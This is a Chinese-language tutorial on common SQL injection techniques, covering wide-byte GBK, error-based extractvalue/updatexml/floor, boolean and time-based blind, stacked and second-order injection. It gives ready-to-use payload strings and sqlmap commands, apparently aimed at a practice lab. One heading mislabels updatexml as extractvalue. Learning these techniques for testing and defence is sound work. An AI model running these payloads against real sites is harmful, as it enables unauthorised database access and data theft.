Bootstrap

常见SQL注入手法

1.联合查询

参考sql注入基础部分:
sql注入基础(一)

2.伪静态注入

伪静态判断方法:

(1)删除后缀.html后页面仍然正常,可能是伪静态页面
(2)使用F12打开控制台,输入javascript:alert(document.lastModified)

//如果返回的时间是当前的时间,那么就基本上可以判断为伪静态页面了

(3)工具判断:
对.html前的参数加上*,再利用工具去测试
例:sqlmap -u "http://www.example.com/index/id/1*.html" 

3.宽字节注入

原理

宽字节注入指的是 mysql 数据库在使用宽字节(GBK)编码时,会认为两个字符是一个汉字(前一个ascii码要大于128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql会调用转义函数,将单引号变为’,其中\的十六进制是%5c,mysql的GBK编码,会认为%df%5c是一个宽字节,也就是’運’,从而使单引号闭合(逃逸),进行注入攻击。

方法一:

?id=1%df' order by 3 --+	//在%5c(')前面加入%df
?id=1%d5' order by 3 --+	//或者是%d5

方法二:

使用sqlmap
(1)#使用自带脚本--tamper “unmagicquotes.py"
(2)#在注入点后面加上%df

4.报错注入

//条件:有数据库报错处理判断标准

(1)extractvalue()报错注入

原理:

extractvalue(xml_document,xpath_string)
第一个参数:XML_document是 String 格式,为XMIL文档对象的名称
第二个参数:XPath_string (Xpath格式的字符串)
作用: 从目标XML中返回包含所查询值的字符串

//返回结果限制在32位字符

方法:

爆库:
?id=1 and extractvalue(1,concat(0x7e,database())) --+
爆表:
and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+

(2)extractvalue报错注入

原理:

updatexml()函数是MYSQL对XML文档数据进行查询和修改的XPATH函数
UPDATEXML (xml_document, XPathstring, new_value)
第一个参数:xml_document,文档名称
第二个参数:XPathstring (Xpath格式的字符串),做内容定位
第三个参数:new_value,String格式,替换查找到的符合条件的值

作用:

改变文档中符合条件的节点的值

方法:

?id=1 and updatexml(0x7e,concat(0x7e,database()),0x7e) --+
?id=1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where 	table_schema=database() limit 0,1),0x7e),1) --+

(3)floor,count,group by冲突报错

原理

利用数据库表主键不能重复的原理,使用GROUP BY分组,因为floor(rand(0)*2)的重复性,产生主键冗余,导致group by语句出错

方法

爆库:
?id=-1 union select count(*),1,concat((select database()),floor(rand(0)*2))as a from information_schema.tables group by a --+

//count(*) 统计所有的行数,包括为null的行
//concat 用于将两个字符串连接为一个字符串
//group by key 循环读取数据的每一行

爆表:
?id=-1 union select count(*),1,concat((select table_name from information_schema.tables where table_schema = 'security'),floor(rand(0)*2))as a from information_schema.tables group by a --+

5.基于布尔的盲注

原理

根据注入信息返回true or fales,及页面显示是否正常,来进行判断输入语句是否正确

条件

有数据库输出判断标准

方法

?id=1 and length(database())=7 --+

//由于布尔注入太过麻烦,建议找到注入点后直接用sqlmap进行注入

6.基于延时的盲注

原理

通过and sleep(5)来判断一下页面的响应时间,相应时间在五秒多一点的话,说明此处可以使用延时注入

方法

?id=1 and if(1=1,sleep(5),0)
?id=1 and if(ascii(substr(database(),1,1))= 115,sleep(5),0) --+

//跟布尔注入类似

7.堆叠注入

原理
mysql_multi_query() 支持多条sql语句同时执行,在执行多条SQL语句时使用结束符(;)隔开

方法

?id=1'; show databases;

8.二次注入

原理

第一步:插入恶意数据第一次进行数据库插入数据的时候,仅仅对其中的特殊字符进行了转义,在写入数据库的时候还是保留了原来的数据,但是数据本身包含恶意内容。
第二步:引用恶意数据在将数据存入到了数据库中之后,开发者就认为数据是可信的。在下一次需要进行查询的时候,直接从数据库中取出了恶意数据,没有进行进一步的检验和处理,这样就会造成SQL的二次注入
;